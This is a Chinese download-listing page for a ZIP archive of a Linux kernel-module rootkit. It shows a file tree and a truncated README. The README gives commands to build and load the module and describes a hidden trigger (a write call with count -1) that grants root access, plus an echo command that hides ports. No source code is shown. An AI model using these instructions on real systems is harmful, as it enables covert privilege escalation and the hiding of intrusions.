文件名称:lkm-rootkit:作为 linux 内核模块实现的 rootkit
文件大小:6KB
文件格式:ZIP
更新时间:2024-06-28 14:08:46
C
lkm-rootkit 作为 linux 内核模块实现的 rootkit ##Syscall 表:###NOTICE:此内核模块仅与 64 位 PC 兼容。 如果您的 PC 是 32 位,请不要运行。 加载“rootkit”模块: make -f Makefile sudo insmod rootkit.ko dmesg | tail 要移除模块: sudo rmmod rootkit 为了能够获得root访问权限: After loading the module, Invoke the write function with the last parameter (the count) passed as -1 为了能够隐藏端口: After loading the module, Isssue the following command echo "hp PORT
【文件预览】:
lkm-rootkit-master
----rootkit.c(13KB)
----testRootPart.c(558B)
----README.txt(493B)
----README.md(791B)
----Makefile(187B)
----.gitignore(223B)